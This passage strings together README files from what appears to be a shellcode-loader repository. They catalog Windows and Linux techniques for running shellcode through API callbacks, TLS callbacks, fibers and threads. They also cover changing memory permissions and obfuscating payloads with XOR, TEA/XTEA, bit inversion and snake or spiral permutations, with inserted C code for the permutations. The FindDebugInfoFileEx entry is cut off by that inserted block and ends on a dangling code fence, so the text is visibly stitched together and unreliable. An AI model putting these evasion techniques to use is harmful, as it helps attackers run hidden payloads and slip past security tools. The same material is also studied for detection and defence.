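The counter variant defeats the classic single-key XOR weakness where a run of identical plaintext bytes (a NOP sled) produces a run of identical ciphertext bytes; the known-answer check above shows three `0x90` bytes encoding to three different values.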
--------------------------------------------------------------------------------
/windows/execution/callback/EnumObjects/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `EnumObjects`.

```c++
int EnumObjects (HDC hdc, int nType, GOBJENUMPROC lpFunc, LPARAM lParam);
```

### Reference

- [MSDN EnumObjects](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enumobjects)
--------------------------------------------------------------------------------
/windows/execution/callback/LdrpCallInitRoutine/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `LdrpCallInitRoutine`.

`LdrpCallInitRoutine` is an internal, low-level ntdll function (not part of the public API).

```c++
char LdrpCallInitRoutine (LpCallInitRoutine callback, size_t, unsigned int, size_t);
```

### Reference

--------------------------------------------------------------------------------
/windows/execution/callback/LineDDA/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `LineDDA`.

```c++
BOOL LineDDA (int xStart, int yStart, int xEnd, int yEnd, LINEDDAPROC lpProc, LPARAM data);
```

### Reference

- [MSDN LineDDA](https://docs.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-linedda)
--------------------------------------------------------------------------------
/windows/storage/section/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Store shellcode as a separate section in the executable.

### Overview

The shellcode is stored as an array of bytes in a dedicated section whose characteristics already grant the required (executable) permission. The shellcode can therefore be executed in place, without a separate allocation.

Note: the samples here execute the shellcode by running it on a separate thread.
--------------------------------------------------------------------------------
/windows/writing/copy/RtlMoveMemory/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copy the shellcode with `RtlMoveMemory`.

```c++
VOID RtlMoveMemory (VOID *Destination, const VOID *Source, SIZE_T Length);
```

### Reference

- [MSDN RtlMoveMemory](https://docs.microsoft.com/en-us/windows/win32/devnotes/rtlmovememory)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumMetaFile/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `EnumMetaFile`.

```c++
BOOL EnumMetaFile (HDC hdc, HMETAFILE hmf, MFENUMPROC proc, LPARAM param);
```

### Reference

- [MSDN EnumMetaFile](https://learn.microsoft.com/en-us/windows/win32/api/wingdi/nf-wingdi-enummetafile)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumPwrSchemes/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `EnumPwrSchemes`.

```c++
BOOLEAN EnumPwrSchemes (PWRSCHEMESENUMPROC lpfn, LPARAM lParam);
```

### Reference

- [MSDN EnumPwrSchemes](https://docs.microsoft.com/en-us/windows/win32/api/powrprof/nf-powrprof-enumpwrschemes)
--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThread/rust/with-winapi/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies.winapi]
version = "0.3.9"
features = [
    "errhandlingapi",
    "memoryapi",
    "processthreadsapi",
    "synchapi",
    "winbase",
    "winnt",
]
--------------------------------------------------------------------------------
/windows/writing/encryption/block/camellia/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

Uses the `Tiny Encryption Algorithm` (TEA) for the encryption (this README and its references describe TEA, although the directory is named camellia).

### Reference

- [Wiki TEA Reference](https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm)
- [Reversing.ID TEA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/TEA/code.c)
--------------------------------------------------------------------------------
/windows/execution/event/SetTimer/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode using a timer.

### Overview

Run the shellcode with `SetTimer`, passing the shellcode address as the `TIMERPROC`. The callback is invoked when the timer elapses, which requires the calling thread to run a message loop.

```c++
UINT_PTR SetTimer (HWND hWnd, UINT_PTR nIDEvent, UINT uElapse, TIMERPROC lpTimerFunc);
```

### Reference

- [MSDN SetTimer](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-settimer)
--------------------------------------------------------------------------------
/windows/storage/stack/rust/with-wrapper/Cargo.toml:
--------------------------------------------------------------------------------
[package]
name = "shellcode-loader"
version = "0.1.0"
edition = "2021"
authors = ["Satria Ady Pradana "]

[dependencies]
windows = { version = "0.35.0", features = [
    "Win32_Foundation",
    "Win32_Security",
    "Win32_System_Memory" ,
    "Win32_System_Threading",
    "Win32_System_WindowsProgramming"
]}
--------------------------------------------------------------------------------
/windows/writing/copy/CopyMemory/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copy the shellcode with `CopyMemory`.

```c++
void CopyMemory (PVOID Destination, const VOID *Source, SIZE_T Length);
```

### Reference

- [MSDN CopyMemory](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa366535(v=vs.85))
--------------------------------------------------------------------------------
/windows/writing/copy/MoveMemory/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copy the shellcode with `MoveMemory`.

```c++
void MoveMemory (PVOID Destination, const VOID *Source, SIZE_T Length);
```

### Reference

- [MSDN MoveMemory](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa366788(v=vs.85))
--------------------------------------------------------------------------------
/linux/allocation/mmap/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocate with `mmap` (an anonymous private mapping); release it again with `munmap`.

```c++
#include <sys/mman.h>

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);

int munmap(void *addr, size_t length);
```

### Reference

- [Man 7](https://man7.org/linux/man-pages/man2/mmap.2.html)
--------------------------------------------------------------------------------
/linux/allocation/shmat/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocate with System V shared memory: `shmget` creates the shared memory segment and `shmat` attaches it to the address space of the process.

```c++
#include <sys/types.h>
#include <sys/shm.h>

void * shmat(int shmid, const void * shmaddr, int shmflg);
```

### Reference

- [Man 2](https://linux.die.net/man/2/shmat)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumChildWindows/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `EnumChildWindows`.

```c++
BOOL EnumChildWindows (HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam);
```

### Reference

- [MSDN EnumChildWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumchildwindows)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumThreadWindows/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `EnumThreadWindows`.

```c++
BOOL EnumThreadWindows (DWORD dwThreadId, WNDENUMPROC lpfn, LPARAM lParam);
```

### Reference

- [MSDN EnumThreadWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumthreadwindows)
--------------------------------------------------------------------------------
/windows/execution/callback/ImmEnumInputContext/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing a callback to run shellcode.

### Overview

Run the shellcode with `ImmEnumInputContext`.
```c++
BOOL ImmEnumInputContext (DWORD idThread, IMCENUMPROC lpfn, LPARAM lParam);
```

### Reference

- [MSDN ImmEnumInputContext](https://docs.microsoft.com/en-us/windows/win32/api/imm/nf-imm-immenuminputcontext)
--------------------------------------------------------------------------------
/windows/execution/callback/acmDriverEnum/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `acmDriverEnum`.

```c++
MMRESULT ACMAPI acmDriverEnum(ACMDRIVERENUMCB fnCallback, DWORD_PTR dwInstance, DWORD fdwEnum);
```

### Reference

- [MSDN acmDriverEnum](https://learn.microsoft.com/en-us/windows/win32/api/msacm/nf-msacm-acmdriverenum)
--------------------------------------------------------------------------------
/windows/execution/fiber/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Executing shellcode as a fiber.

A fiber is a unit of execution that is scheduled cooperatively: it runs until it explicitly switches to another fiber. Like a thread, a fiber shares the memory space with the other threads and fibers of the same process.

In outline, the extracted shellcode is copied into memory that has been allocated for it, and the shellcode address then becomes the fiber's entry-point function. The calling thread must first turn itself into a fiber (`ConvertThreadToFiber`) before it can create the new fiber and switch to it.
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDesktopWindows/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `EnumDesktopWindows`.
```c++
BOOL EnumDesktopWindows (HDESK hDesktop, WNDENUMPROC lpfn, LPARAM lParam);
```

### Reference

- [MSDN EnumDesktopWindows](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdesktopwindows)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemGeoID/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `EnumSystemGeoID`.

```c++
BOOL EnumSystemGeoID (GEOCLASS GeoClass, GEOID ParentGeoId, GEO_ENUMPROC lpGeoEnumProc);
```

### Reference

- [MSDN EnumSystemGeoID](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemgeoid)
--------------------------------------------------------------------------------
/windows/writing/custom/bit-inverse/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Transforming the shellcode with custom algorithm.

### Overview

Bit manipulation in the form of an `inverse` (bitwise NOT) applied to every bit of every shellcode byte.

Inversion replaces each bit with its complement: `1` becomes `0` and `0` becomes `1`. For example, `0x90` is `1001 0000` in binary; inverting it gives `0110 1111`, i.e. `0x6F`. Applying the operation a second time restores the original byte, so the same routine serves as encoder and decoder.
--------------------------------------------------------------------------------
/windows/execution/callback/LdrEnumerateLoadedModules/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `LdrEnumerateLoadedModules`.
`LdrEnumerateLoadedModules` is an internal, low-level `ntdll.dll` function. It is not declared in the public SDK headers, so the loader has to resolve it at run time (for example with `GetProcAddress` on `ntdll.dll`) and declare the prototype itself.

```c++
NTSTATUS NTAPI LdrEnumerateLoadedModules (BOOLEAN ReservedFlag, PLDR_ENUM_CALLBACK EnumProc, PVOID Context);
```

### Reference

--------------------------------------------------------------------------------
/windows/writing/encryption/block/tea/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

Using the `Tiny Encryption Algorithm (TEA)` for encryption.

### Reference

- [Wiki Tiny Encryption Algorithm](https://en.wikipedia.org/wiki/Tiny_Encryption_Algorithm)
- [Git Tiny Encryption Algorithm implementation](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/TEA/code.c)
--------------------------------------------------------------------------------
/windows/writing/encryption/stream/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption with a stream cipher.

### Overview

A stream cipher is a symmetric-key encryption algorithm that combines the plaintext with a keystream. Each byte (or bit) of the plaintext is encrypted one at a time by combining it, typically with XOR, with the corresponding digit of the keystream.

The algorithm uses a symmetric key: the same key is used for encryption and decryption. Because the keystream depends only on the key (and nonce, where the cipher has one), encrypting two different payloads under the same key and nonce leaks the XOR of the two plaintexts.
--------------------------------------------------------------------------------
/windows/execution/callback/CopyFile2/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `CopyFile2`.
The callback is not a direct parameter: it is supplied through the `pProgressRoutine` member of the extended-parameters structure, and `CopyFile2` invokes it to report copy progress.

```c++
HRESULT CopyFile2 (PCWSTR pwszExistingFileName, PCWSTR pwszNewFileName, COPYFILE2_EXTENDED_PARAMETERS *pExtendedParameters);
```

### Reference

- [MSDN CopyFile2](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-copyfile2)
--------------------------------------------------------------------------------
/windows/execution/callback/DirectSoundEnumerate/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `DirectSoundEnumerate`.

```c++
HRESULT DirectSoundEnumerate (LPDSENUMCALLBACK lpDSEnumCallback, LPVOID lpContext);
```

### Reference

- [MSDN DirectSoundEnumerate](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ee416763(v=vs.85))
--------------------------------------------------------------------------------
/linux/storage/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

The `storage` techniques are the ways the shellcode is kept before it is run from memory. The shellcode can be embedded in the loader itself, or live outside the loader, in which case it has to be fetched first.

### Catalog

Some of the `storage` techniques implemented:

- [stack](stack): keeps the shellcode on the stack of a function.
--------------------------------------------------------------------------------
/windows/execution/thread/tls-callback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Thread Local Storage (TLS) callbacks are invoked by the image loader before the entry point is executed (and again for every thread that is created later).
Some common anti-debug and anti-VM tricks are placed in TLS callbacks precisely because they run on a flow separate from the entry point: an analyst who breaks on the entry point has already missed them.

There can be more than one TLS callback, and a callback can register further callbacks at run time.
--------------------------------------------------------------------------------
/windows/execution/callback/CryptEnumOIDInfo/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `CryptEnumOIDInfo`.

```c++
BOOL CryptEnumOIDInfo (DWORD dwGroupId, DWORD dwFlags, void *pvArg, PFN_CRYPT_ENUM_OID_INFO pfnEnumOIDInfo);
```

### Reference

- [MSDN CryptEnumOIDInfo](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptenumoidinfo)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDisplayMonitors/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `EnumDisplayMonitors`.

```c++
BOOL EnumDisplayMonitors (HDC hdc, LPCRECT lprcClip, MONITORENUMPROC lpfnEnum, LPARAM dwData);
```

### Reference

- [MSDN EnumDisplayMonitors](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumdisplaymonitors)
--------------------------------------------------------------------------------
/windows/permission/VirtualProtect/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Change the memory protection of virtual address space.

### Overview

Change the permission with `VirtualProtect`. Switching a region from `PAGE_READWRITE` to `PAGE_EXECUTE_READ` after the shellcode has been written avoids ever holding a writable-and-executable region; `lpflOldProtect` must point to a valid `DWORD`, otherwise the call fails.
```c++
BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
```

### Reference

- [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)

--------------------------------------------------------------------------------
/windows/writing/permutation/snake/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Reordering the shellcode with custom algorithm.

### Overview

Rearranging the byte positions of the shellcode in a snake pattern: the bytes are laid out in rows of a fixed width and every other row is read backwards.

example:

```
initial:
1 2 3 4
5 6 7 8
9 10 11 12
result:
1 2 3 4 8 7 6 5 9 10 11 12
```

The stored shellcode has the format `[Key] [Encoded Shellcode]`.

### Reference

--------------------------------------------------------------------------------
/windows/permission/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

The `permission` techniques set or clear the executable bit on a given memory region, which indicates whether that region may be executed.

### Catalog

List of the implemented `permission` techniques:

- [NtProtectVirtualMemory](NtProtectVirtualMemory)
- [VirtualProtect](VirtualProtect)
- [VirtualProtectEx](VirtualProtectEx)
--------------------------------------------------------------------------------
/linux/execution/thread/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Executing shellcode as a separate thread that shares the address space of the process (memory is shared between the threads of one process).
Several threading primitives (public or internal) are available that can be used to start the thread.

In outline, the extracted shellcode is copied into memory that has been allocated for it, and the shellcode address then becomes the thread's entry-point function.
--------------------------------------------------------------------------------
/windows/execution/callback/EnumTimeFormatsEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `EnumTimeFormatsEx`.

```c++
BOOL EnumTimeFormatsEx (TIMEFMT_ENUMPROCEX lpTimeFmtEnumProcEx, LPCWSTR lpLocaleName, DWORD dwFlags, LPARAM lParam);
```

### Reference

- [MSDN EnumTimeFormatsEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumtimeformatsex)
--------------------------------------------------------------------------------
/windows/execution/callback/InitOnceExecuteOnce/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `InitOnceExecuteOnce`.

```c++
BOOL InitOnceExecuteOnce (PINIT_ONCE InitOnce, PINIT_ONCE_FN InitFn, PVOID Parameter, LPVOID *Context);
```

### Reference

- [MSDN InitOnceExecuteOnce](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-initonceexecuteonce)
--------------------------------------------------------------------------------
/windows/execution/callback/PlaExtractCabinet/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `PlaExtractCabinet`.
```c++
HRESULT PlaExtractCabinet (PCWSTR CabFileName, PCWSTR DestPath, PLA_CABEXTRACT_CALLBACK Callback, PVOID Context);
```

### Reference

- [github pla.h](https://github.com/nihon-tc/Rtest/blob/master/header/Microsoft%20SDKs/Windows/v7.0A/Include/pla.h)
--------------------------------------------------------------------------------
/windows/execution/thread/SHCreateThread/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Executing shellcode through `SHCreateThread`. The optional `pfnCallback` is executed synchronously on the calling thread before `pfnThreadProc` runs on the new thread, so either parameter can carry the shellcode.

```c++
BOOL SHCreateThread (LPTHREAD_START_ROUTINE pfnThreadProc, void * pData, SHCT_FLAGS flags, LPTHREAD_START_ROUTINE pfnCallback);
```

### Reference

- [MSDN SHCreateThread](https://docs.microsoft.com/en-us/windows/win32/api/shlwapi/nf-shlwapi-shcreatethread)
--------------------------------------------------------------------------------
/windows/execution/callback/DirectSoundCaptureEnumerate/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `DirectSoundCaptureEnumerate`.

```c++
HRESULT DirectSoundCaptureEnumerate (LPDSENUMCALLBACK lpDSEnumCallback, LPVOID lpContext);
```

### Reference

- [MSDN DirectSoundCaptureEnumerate](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ee416761(v=vs.85))
--------------------------------------------------------------------------------
/windows/execution/callback/EnumSystemLocalesEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `EnumSystemLocalesEx`.
```c++
BOOL EnumSystemLocalesEx (LOCALE_ENUMPROCEX lpLocaleEnumProcEx, DWORD dwFlags, LPARAM lParam, LPVOID lpReserved);
```

### Reference

- [MSDN EnumSystemLocalesEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumsystemlocalesex)
--------------------------------------------------------------------------------
/windows/execution/thread/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Executing shellcode as a separate thread that shares the address space of the process (memory is shared between the threads of one process). Windows offers several threading functions (public and internal) that can be used to start the thread.

In outline, the extracted shellcode is copied into memory that has been allocated for it, and the shellcode address then becomes the thread's entry-point function.
--------------------------------------------------------------------------------
/windows/writing/encryption/block/xtea/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Shellcode encryption.

### Overview

Using the `eXtended Tiny Encryption Algorithm (XTEA)` for encryption.

### References

- [Reversing.ID XTEA Reference](https://github.com/ReversingID/Crypto-Reference/tree/master/References/Modern/Block-Cipher/XTEA)
- [Reversing.ID XTEA Code](https://github.com/ReversingID/Crypto-Reference/blob/master/Codes/Cipher/Block/XTEA/code.c)
--------------------------------------------------------------------------------
/linux/allocation/posix_memalign/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocation with `posix_memalign`.
`posix_memalign` allocates a block whose start address is a multiple of `alignment` (which must be a power of two and a multiple of `sizeof(void *)`). Passing the page size as the alignment yields a page-aligned block, which is what a later `mprotect` call needs, since protection changes apply to whole pages.

```c++
#include <stdlib.h>

int posix_memalign(void **memptr, size_t alignment, size_t size);
```

### Reference

- [Man 3](https://linux.die.net/man/3/posix_memalign)
--------------------------------------------------------------------------------
/windows/execution/callback/CertEnumSystemStore/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `CertEnumSystemStore`.

```c++
BOOL CertEnumSystemStore (DWORD dwFlags, void *pvSystemStoreLocationPara, void *pvArg, PFN_CERT_ENUM_SYSTEM_STORE pfnEnum);
```

### Reference

- [MSDN CertEnumSystemStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumsystemstore)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumDateFormatsExEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `EnumDateFormatsExEx`.

```c++
BOOL EnumDateFormatsExEx (DATEFMT_ENUMPROCEXEX lpDateFmtEnumProcExEx, LPCWSTR lpLocaleName, DWORD dwFlags, LPARAM lParam);
```

### Reference

- [MSDN EnumDateFormatsExEx](https://docs.microsoft.com/en-us/windows/win32/api/winnls/nf-winnls-enumdateformatsexex)
--------------------------------------------------------------------------------
/windows/permission/VirtualProtectEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Change the memory protection of virtual address space.

### Overview

Change the permission with `VirtualProtectEx`. Unlike `VirtualProtect`, it takes a process handle, so the protection of memory in another process can be changed as well (the handle needs `PROCESS_VM_OPERATION` access).

```c++
BOOL VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect);
```

### Reference

- [MSDN VirtualProtectEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex)

--------------------------------------------------------------------------------
/windows/writing/permutation/rail-fence/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Reordering the shellcode with custom algorithm.

### Overview

Rearranging the byte positions of the shellcode with the rail-fence (zig-zag) cipher.

The stored shellcode has the format `[Key] [Encoded Shellcode]`.

### Reference

- [Wiki Rail-Fence Cipher](https://en.wikipedia.org/wiki/Rail_fence_cipher)
- [online encoder/decoder](https://www.dcode.fr/rail-fence-cipher)
--------------------------------------------------------------------------------
/windows/execution/callback/CertEnumPhysicalStore/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `CertEnumPhysicalStore`.
```c++
BOOL CertEnumPhysicalStore (const void *pvSystemStore, DWORD dwFlags, void *pvArg, PFN_CERT_ENUM_PHYSICAL_STORE pfnEnum);
```

### Reference

- [MSDN CertEnumPhysicalStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certenumphysicalstore)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumerateLoadedModules/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `EnumerateLoadedModules`.

```c++
BOOL EnumerateLoadedModules (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK EnumLoadedModulesCallback, PVOID UserContext);
```

### Reference

- [MSDN EnumerateLoadedModules](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodules)
--------------------------------------------------------------------------------
/windows/execution/callback/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

### Overview

Abusing Windows APIs to execute the shellcode as a callback.

Some Windows APIs accept a callback that they invoke to handle an object or to process the result of an operation. Running the shellcode as such a callback makes the loader less conspicuous, because the call into the shellcode is implicit: it is made by the API rather than by the loader's own code.

Usually the callback runs on the same thread as the one that called the Windows API. Enumeration APIs invoke the callback once per enumerated object, and the callback is expected to follow the calling convention of the callback type (`CALLBACK`, i.e. `__stdcall` on 32-bit builds) and to return a value that tells the API whether to continue.
--------------------------------------------------------------------------------
/windows/writing/copy/WriteProcessMemory/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copying the shellcode with `WriteProcessMemory`. The function writes into the address space of the process identified by `hProcess` (the handle needs `PROCESS_VM_WRITE` and `PROCESS_VM_OPERATION`); it also works on the current process with `GetCurrentProcess()`.

```c++
BOOL WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T *lpNumberOfBytesWritten);
```

### Reference

- [MSDN WriteProcessMemory](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)
--------------------------------------------------------------------------------
/windows/writing/permutation/spiral/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Reordering the shellcode with custom algorithm.

### Overview

Rearranging the byte positions of the shellcode in a spiral pattern: the bytes are laid out in a grid and read clockwise from the top-left corner inwards.

example:

```
initial:
1 2 3 4
5 6 7 8
9 10 11 12
13 14 15 16
result:
1 2 3 4 8 12 16 15 14 13 9 5 6 7 11 10
```

The stored shellcode has the format `[Key] [Encoded Shellcode]`.

### Reference

--------------------------------------------------------------------------------
/windows/execution/callback/FindDebugInfoFileEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Executing shellcode through `FindDebugInfoFileEx`.
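The snake and spiral reorderings described in the permutation READMEs above, as an added example that is not the repository's own code. Each layout is expressed as an index permutation so that the encoder (a build-time script) and the loader (the decoder) share one code path. The row width stands in for the `[Key]` that precedes the encoded shellcode, the spiral variant assumes the shellcode has been padded to a full grid, and the input bytes 1..16 are constructed test data.

```c
/* Added example (not the repository's code): snake and spiral byte
 * permutations as index maps, plus the inverse map a loader applies.
 * perm[k] = index in the original buffer of the byte placed at position k. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Snake (boustrophedon): rows of `width`, every odd row read right-to-left.
 * A final partial row is handled the same way over the bytes it has. */
void snake_perm(size_t n, size_t width, size_t *perm)
{
    size_t k = 0;
    for (size_t row = 0; row * width < n; row++) {
        size_t start = row * width;
        size_t end = (start + width < n) ? start + width : n;   /* exclusive */
        if (row % 2 == 0)
            for (size_t i = start; i < end; i++) perm[k++] = i;
        else
            for (size_t i = end; i-- > start; )   perm[k++] = i;
    }
}

/* Spiral: walk a rows x cols grid clockwise from the top-left corner,
 * shrinking the boundary after each side. Requires n == rows * cols. */
void spiral_perm(size_t rows, size_t cols, size_t *perm)
{
    size_t top = 0, left = 0, bottom = rows, right = cols, k = 0;
    while (top < bottom && left < right) {
        for (size_t c = left; c < right; c++)     perm[k++] = top * cols + c;
        top++;
        for (size_t r = top; r < bottom; r++)     perm[k++] = r * cols + (right - 1);
        right--;
        if (top < bottom) {
            for (size_t c = right; c-- > left; )  perm[k++] = (bottom - 1) * cols + c;
            bottom--;
        }
        if (left < right) {
            for (size_t r = bottom; r-- > top; )  perm[k++] = r * cols + left;
            left++;
        }
    }
}

/* Encoder side: out[k] = in[perm[k]]. */
void apply_perm(const uint8_t *in, uint8_t *out, const size_t *perm, size_t n)
{
    for (size_t k = 0; k < n; k++) out[k] = in[perm[k]];
}

/* Loader side: undo the reordering, out[perm[k]] = in[k]. */
void invert_perm(const uint8_t *in, uint8_t *out, const size_t *perm, size_t n)
{
    for (size_t k = 0; k < n; k++) out[perm[k]] = in[k];
}

/* Encode with a given permutation, then decode again and return 1 only if the
 * original bytes come back: the self-check a build script should run before
 * the encoded blob is embedded in a loader. */
static int roundtrip(const uint8_t *in, size_t n, const size_t *perm, uint8_t *encoded)
{
    uint8_t *back = malloc(n);
    if (!back) return 0;
    apply_perm(in, encoded, perm, n);
    invert_perm(encoded, back, perm, n);
    int ok = memcmp(in, back, n) == 0;
    free(back);
    return ok;
}

int snake_roundtrip(const uint8_t *in, size_t n, size_t width, uint8_t *encoded)
{
    size_t *perm = malloc(n * sizeof *perm);
    if (!perm) return 0;
    snake_perm(n, width, perm);
    int ok = roundtrip(in, n, perm, encoded);
    free(perm);
    return ok;
}

int spiral_roundtrip(const uint8_t *in, size_t rows, size_t cols, uint8_t *encoded)
{
    size_t n = rows * cols;
    size_t *perm = malloc(n * sizeof *perm);
    if (!perm) return 0;
    spiral_perm(rows, cols, perm);
    int ok = roundtrip(in, n, perm, encoded);
    free(perm);
    return ok;
}

int main(void)
{
    uint8_t sc[16], enc[16];
    for (int i = 0; i < 16; i++) sc[i] = (uint8_t)(i + 1);   /* constructed "shellcode" 1..16 */
    if (spiral_roundtrip(sc, 4, 4, enc))
        for (int i = 0; i < 16; i++) printf("%d ", enc[i]);
    printf("\n");
    return 0;
}
```

Run on the README's 3x4 and 4x4 inputs, the encoder reproduces the sequences shown above; the loader only needs `invert_perm` and the width recovered from the `[Key]` prefix.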
```c++
